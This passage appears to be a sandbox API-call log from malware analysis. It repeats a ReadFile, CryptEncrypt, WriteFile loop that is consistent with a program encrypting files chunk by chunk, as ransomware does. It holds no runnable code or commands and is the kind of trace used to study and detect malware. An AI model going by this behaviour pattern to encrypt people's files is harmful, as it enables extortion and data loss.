lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.628] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.629] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.629] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.629] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.629] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.629] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.629] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.629] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.629] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.629] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.629] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.629] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.629] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.629] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.629] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.630] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.630] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.630] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.630] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.630] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.630] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.630] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.630] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.630] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.630] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.630] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.630] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.630] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.630] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.631] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.631] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.631] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.631] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.631] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.631] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.631] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.631] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.631] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.631] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.631] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.631] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.631] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.632] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.632] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.632] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.632] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.632] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.632] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.632] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.632] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.632] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.632] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.632] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.632] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.632] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.632] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.632] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.633] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.633] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.633] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.633] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.633] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.633] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.633] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.633] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.633] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.633] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.633] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.633] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.633] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.634] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.634] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.634] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.634] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.634] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.634] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.634] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.634] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.634] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.634] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.634] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.634] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.634] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.634] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.635] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.635] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.635] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.635] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.635] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.635] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.635] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.635] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.635] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.635] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.635] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.635] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.635] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, 